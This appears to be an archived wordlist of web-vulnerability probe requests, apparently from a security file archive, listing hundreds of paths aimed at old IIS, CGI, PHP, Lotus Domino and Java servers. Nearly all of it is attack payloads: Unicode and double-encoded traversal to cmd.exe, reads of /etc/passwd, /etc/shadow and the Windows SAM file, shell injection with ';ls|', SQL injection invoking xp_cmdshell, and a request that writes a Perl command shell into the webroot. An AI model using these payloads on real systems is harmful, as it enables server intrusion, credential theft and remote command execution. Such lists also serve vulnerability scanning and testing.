/scripts/iisadmin/samples/details.idc
/scripts/iisadmin/samples/query.htx
/scripts/iisadmin/samples/query.idc
/scripts/iisadmin/samples/register.htx
/scripts/iisadmin/samples/register.idc
/scripts/iisadmin/samples/sample.htx
/scripts/iisadmin/samples/sample.idc
/scripts/iisadmin/samples/sample2.htx
/scripts/iisadmin/samples/viewbook.htx
/scripts/iisadmin/samples/viewbook.idc
/scripts/iisadmin/tools/ct.htx
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/dsnform.exe
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/iisadmin/tools/newdsn.exe
/scripts/perl?
/scripts/pfieffer.bat
/scripts/pfieffer.cmd
/scripts/postinfo.asp
/scripts/pu3.pl
/scripts/run.exe
/scripts/samples/search/webhits.exe
/scripts/srchadm/admin.idq
/scripts/submit.cgi
/scripts/tools/getdrvs.exe
/scripts/upload.asp
/scripts/uploadx.asp
/scripts/visadmin.exe
/search
/secure/.htaccess
/secure/.wwwacl
/session/admnlogin
/srchadm
/ss.cfg
/stats
/status
/status.cgi
/test/test.cgi
/today.nsf
/tools/newdsn.exe
/users/scripts/submit.cgi
/webcart/
/WebSTART%20LOG
/xxxxxxx.....xxxxxxxxx/
fpdb/shop.mdb
shoponline/fpdb/shop.mdb
database/metacart.mdb
shopping/database/metacart.mdb
shop/database/metacart.mdb
metacart/database/metacart.mdb
mcartfree/database/metacart.mdb
ASP/cart/database/metacart.mdb
_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\orderinfo.txt
/%00.nsf/../lotus/domino/notes.ini
/%2e%2e/%2e%2e/%2e%2e/scandisk.log
/%2eHTACCESS
/%2ehtpasswd
/%3f.jsp
/*.jsp::$DATA/
/*.shtml/login.jsp
"/.""./.""./Perl/eg/core/findtar"
"/.""./.""./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl"
"/.""./.""./winnt/reapir/sam._%20.pl"
/..../scandisk.log
/.../
/.../.../scandisk.log
/../../shadow
/../../template/shared/indexTemplate.xml
/../../winnt/win.ini%00examples/jsp/hello.jsp
/../scandisk.log
/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+
/./WEB-INF/
/./WEB-INF/web.xml
/.box/../winnt/win.ini
/.dS_store
/.HTACCESS.
/.jsp/WEB-INF/classes/Env.java
/.ns4/../winnt/win.ini
/.nsf/../lotus/domino/notes.ini
/.nsf/../winnt/win.ini
//WEB-INF/
//WEB-INF/web.xml
//WEB-INF/webapp.properties
/\.../
/_AuthChangeUrl
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/~/
/~admin/
/~bin/
/~guest/
/~log/
/~logs/
/~lp/
/~named/
/~nobody/
/~root/
/~test/
/~tmp/
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/C:/winnt/repair/sam._
/a.jsp//..//..//..//..//..//../winnt/win.ini
/a/
/adcycle/AdLogin.pm
/AdLogin.pm
/admin.php?upload=1&file=config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt
/admin/?op=%c0
/admin/case/case.filemanager.php/admin.php?op=move&confirm=1&do=copy&basedir=&file=/tmp/dat.dat&newfile=done.php
/administration/
/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/asearch.cnf
/AspUpload/Samples/Test11.asp
/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah
/basilix/basilix.php?username=blah;ls
/basilix/basilix.php3?username=blah;ls
/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
/cfbin/board.cgi
/CFDOCS/exampleapps/
/cgi/
/cgi/bin/test.txt;%20/bin/ls
/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/a1stats/a1disp.cgi?|/bin/ls|
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/hosts
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts
/cgi-bin/adcycle/adcenter.cgi
/cgi-bin/af.cgi?_browser_out=|/bin/ls|
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../etc/hosts
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts
/cgi-bin/bbs_forum.cgi?forum=test&read=../bbs_forum.cgi
/cgi-bin/blat.exe
/cgi-bin/board.cgi
/cgi-bin/bsguest.cgi?email=x;ls
/cgi-bin/bslist.cgi?email=x;ls
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00
/cgi-bin/CatalogMgr.pl?cartID=366&template=CatalogMgr.pl
/cgi-bin/cgiemail/uargg.txt?0=0&1=1&2=2&256=256&array=array&a=a&i=i&c=c&arr=arr
/cgi-bin/CGImail.exe?%24Attach%24=file.txt&%24To%24=swoopme@hotmail.com
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls|
/cgi-bin/console.exe?page_size=
/cgi-bin/cs.exe?action=
/cgi-bin/csvform.pl?file=/bin/ls%00|
/cgi-bin/cwmail.ini
/cgi-bin/db2www.exe/../../db2www.ini
/cgi-bin/db2www/../../db2www.ini
/cgi-bin/dcboard.cgi
/cgi-bin/dcforum.cgi?az=list&file=filename%00
/cgi-bin/dcforum/dcboard.cgi
/cgi-bin/dcforum/dcforum.cgi?az=list&file=filename%00
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/debug.cgi
/cgi-bin/debug.pl
/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/hosts%00
/cgi-bin/download.cgi?s=path&c=txt&f=fn
/cgi-bin/download.pl?s=path&c=txt&f=fn
/cgi-bin/empower?DB=mungowitsch
/cgi-bin/eshop.pl?seite=;ls|
/cgi-bin/ezshopper2/loadpage.cgi?id+/
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
/cgi-bin/finger.cgi
/cgi-bin/forma
/cgi-bin/formhandler/formhandler.cgi
/cgi-bin/FormMail.cgi
/cgi-bin/form-to-mail.cgi?_out_file=mungo.dat&x=y
/cgi-bin/formvar.exe
/cgi-bin/forums/dcboard.cgi
/cgi-bin/futureforum3.cgi
/cgi-bin/getcomments.pl
/cgi-bin/gettext.pl
/cgi-bin/guestserver.cgi?email=|ls|swoopme@hotmail.com
/cgi-bin/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/hwtestio
/cgi-bin/ibillpm.pl
/cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
/cgi-bin/lastlines.cgi
/cgi-bin/lb5000/search.cgi
/cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net
/cgi-bin/mail.cgi
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/mailme.exe
/cgi-bin/mailmepro.exe
/cgi-bin/mailnews.cgi
/cgi-bin/MailPost.exe
/cgi-bin/mailsend.exe
/cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/cgi-bin/mgrqcgi?APPNAME=&PRGNAME=200As&ARGUMENTS=&PageID=&mgaction=&H_ShopID=&H_SID=&H_WID=&H_INF=
/cgi-bin/ncbook/book.cgi?action=default¤t=|ls|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
/cgi-bin/newsdesk.cgi?t=../pass.txt
/cgi-bin/nph-maillist.pl
/cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe+HTTP/1.0
/cgi-bin/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/pals-cgi?palsAction=restart&documentName=pals-cgi
/cgi-bin/paramtool
/cgi-bin/passcfg
/cgi-bin/PGPMail.pl
/cgi-bin/pi?page=document/show_file&id=
/cgi-bin/ping.cgi
/cgi-bin/postie.cgi
/cgi-bin/postie.exe
/cgi-bin/post-query?
/cgi-bin/powerup/r.cgi?FILE=main.html
/cgi-bin/powerup/r.pl?FILE=main.html
/cgi-bin/processit.pl
"/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1"
/cgi-bin/sdbsearch.cgi?stichwort=keyword
/cgi-bin/search.pl?form=search.pl%00
/cgi-bin/search/search.cgi?keys=*&prc=any&category=../../../../../../../../etc
"/cgi-bin/sendpage.pl?message=test"";/bin/ls;echo%20""message"
/cgi-bin/sendtemp.pl?templ=../../etc/passwd
/cgi-bin/sgdynamo.exe?HTNAME=default.htm
/cgi-bin/shopper.exe?key=&20&preadd=action&template=order.log
/cgi-bin/shopper.exe?search=action&keywords=%20&template=order.log
/cgi-bin/stats.pl
/cgi-bin/statsconfig.pl
/cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
/cgi-bin/story.cgi?next=
/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
/cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/test.txt;%20/bin/ls
/cgi-bin/traceroute.cgi
/cgi-bin/uncgi
/cgi-bin/user_info.php3?user_username=''+or+admin_level=2+or+username%3d'x'+and+users.id=access.user_id;%00
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls
/cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts
/cgi-bin/w3mail/login.cgi
/cgi-bin/way-board.cgi?db=way-board.cgi%00
/cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/hosts%00&board=tst
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
/cgi-bin/webdriver
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
/cgi-bin/webspirs.cgi?sp.nextform=webspirs.cgi
/cgi-bin/ws_mail.cgi?kill=ng
/cgi-bin/wsendmail.exe
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/hosts%00
/cgi-home/
/cgi-local/
/cgi-local/shop.pl/SID=947626980.19094/page=;ls|
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-sys/PGPMail.pl
/cgiWebupdate.exe
/cgi-win/
/chip.ini
/ChipCfg
/ChipCfg.cfg
/class/mysql.class
/components/AspUpload/Samples/DirectoryListing.asp
/components/AspUpload/Samples/Test11.asp
/components/AspUpload/Samples/UploadScript11.asp
/compose.php
/config.inc
/config/
/content.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000
/db.inc
/db2_doc/html/db2srsen.exe
/dbconfig.inc
/decsadm.nsf
/default.asp%3f.htr
/default.php%20%20
/default.php3%20%20
/deletecontact.php?item_id=100+OR+TRUE+;
/discuss/passwd.txt
"/domcfg.nsf/viewname%3fSearchView&Query=""*"""
/edit_image.php?dn=1&userfile=/etc/hosts&userfile_name=%20;ls;%20
/events4.nsf
/examples/servlet/SnoopServlet
/ext.dll
/ext.dll%00
/foldoc/template.cgi?template.cgi
/global.asa%20.pl
/global.asa%3f.htr
/global.asa%3f.jsp
/global.asa::$DATA
/global.asax
/global.asax.cs
/global.cnf
/globals.pl
/guestserver/guestserver.cgi?email=|ls|swoopme@hotmail.com
/homebet/homebet.dll?form=menu&option=menu-signin
/homebet/homebet.log
/hypermail
/ifx/?LO=../../../../../../../../../etc/hosts
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af../cmd.exe?/c+dir
/iisadmpwd/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/_AuthChangeUrl
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo
/images/tmp.txt
/imp/compose.php
/inc/db.inc
/inc/odbc.inc
/inc/sendmail.inc
/inc/sql.inc
/inc/test.php
/include/config.inc
/include/sql.inc
/include/sql.php
/include/test.php
/includes/
/index.js%2570
/index.jsp::$DATA
/index.php%20%20
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
/index.php3%20%20
/index.search
/info/
/internal/
/interscan/cgi-bin/FtpSave.dll?I'm%20here
/interscan/cgi-bin/FtpSave.dll?no
/interscan/cgi-bin/FtpSave.dll?yes
/isapi/tstisapi.dll
/java/
/join.cfm
/jsp_test/PoolMan.jsp
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist/httplist.htm+httplist/httplist.jse
/logs/webstar.log
/mailman/edithtml
/manual.php
/merchants/admin.pw
"/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20""Content-Type:%20text%2Fhtml""%3Becho%20""""%20%3B%20id%00"
/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/mysql.class
/network_query.php?portNum=80&queryType=all&target=127.0.0.1%3Bls+-l&Submit=Do+It
/odbc.inc
/opendir.php?requesturl=/etc/hosts
/pals-cgi?palsAction=restart&documentName=pals-cgi
/pass?loginpass=a&redirect=0%2F&Submit=Login
/passcfg
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/pbserver/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
/pbserver/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/phpBB/bb_memberlist.php?sortby=user_regdate
"/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'hoschi'%23"
/phpMyAdmin/sql.php?goto=/etc/hosts&btnDrop=No
"/phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK="".passthru('/bin/ls')."""
"/phpMyAdmin/tbl_copy.php?strCopyTableOK="".passthru('/bin/ls')."""
/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/hosts
/phprocketaddin/?page=../../../../../../../etc/hosts
/pi_admin.admin
/ping
/pls/admin_/?
/PoolMan.jsp
/priv/
/private/
/PSUser/PSCOErrPage.htm?errPagePath=/etc/hosts
/quickstart/util/srcview.aspx?path=./&file=srcview.aspx&font=3
/quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_font_file=ariali.ttf
/remote_login.pl%20
/ROADS/cgi-bin/search.pl?form=search.pl%00
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/run.cgi
/run/forma
/s97is.vts?action=View&VdkVgwKey=%2Fetc%2fhosts&doctype=raw&Collection=
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/sbin/
/sbin/nscgi.cfg
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/*.pl
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/blat.exe
/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt
/scripts/formvar.exe
/scripts/mail.cgi
/scripts/mailform.exe
/scripts/mailme.exe
/scripts/mailmepro.exe
/scripts/MailPost.exe
/scripts/mailsend.exe
/scripts/postie.cgi
/scripts/postie.exe
/scripts/rguest.exe
/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;ls|
/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell(""cmd.exe+/c%20dir"");--"
/scripts/toos/mkilog.exe
/scripts/wsendmail.exe
/search/s97.vts?Action=FormGen&ServerKey=Primary&Template=
/search/s97_cgi.exe
/search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books
/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=../../config/log.conf%00%5c&chapter=
/sek-bin/login.gas.bat?Template=../../../../../../../../etc/hosts&LOCALE=en_US&AUTHMETHOD=UserPassword
/servlet//..//../o.jsp
/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
/servlet/com.unify.ewave.servletexec.UploadServlet
/servlet/FormMailServlet?juhu.txt
/servlet/jsp/../../tst.txt
/servlet/psoft.hsphere.CP
/servlet/ServletManager?username=servlet&password=manager
/servlet/ssifilter/../../test.jsp
/servlet/SurveyXMLServlet?jeaaa.txt
/servlet/webacc?User.html=../../../../../../../../boot.ini%00
/servlet/WebPopServlet?config=uii.txt
/session/pagecount?page=
/shtml/
/stat/
/stats/
/store/customers/
/store/temp_customers/
/stronghold-info
/stronghold-status
/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/Test11.asp
/tst/psoft.hsphere.CP/tst/?template_name=x
/upload.html
/user_info.php3?user_username=''+or+admin_level=2+or+username%3d'x'+and+users.id=access.user_id;%00
/way-board/way-board.cgi?db=url_to_any_file%00
/way-board/way-board.cgi?db=way-board.cgi%00
/web.config
/Web_store/web_store.cgi?page=../../../../../../../../etc/passw
/webadmin.nsf
/webadmin.ntf
/WebDB/admin_/
/webmacro/org.paneris.paneris.controller.Page?db=tst&wmtemplate=ttt
/webmacro/Page?db=tst&wmtemplate=ttt
/webres/discuss/passwd.txt
/WebSTAR%20LOG
/webstar.log
/wwwboard/passwd.txt
/xsql/java/demo/
:10000/net/
:10000/servers/link.cgi/1/init/edit_action.cgi?0+../../../../../../../../../etc/hosts
:12000
:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
:2301/Proxy/LoginResponse
:30001/../../template/shared/indexTemplate.xml
:30001/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
:4096/../../../winnt/repair/sam._
:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
:631/admin/?op=%c0
:6346/........../windows/win.ini
:8000/./WEB-INF/
:8000/./WEB-INF/web.xml
:8000/file/%2E%2E/test1.mp3
:8080/%252e%252e/%252e%252e/%00.jsp
:8080/../../winnt/win.ini%00examples/jsp/hello.jsp
:8080/../examples//WEB-INF/../../../../../
:8080/../ssd.ini
:8080/.jsp/WEB-INF/classes/Env.java
:8080/\../readme.txt
:8080/examples/servlet/SnoopServlet
:8080/index.js%2570
:8383/1111/readmail.cgi?uid=user1&mbx=../test/Main
:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3"
:9090//etc/shadow

EOF

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    19 Files
  • 18
    Oct 18th
    21 Files
  • 19
    Oct 19th
    16 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    19 Files
  • 23
    Oct 23rd
    24 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close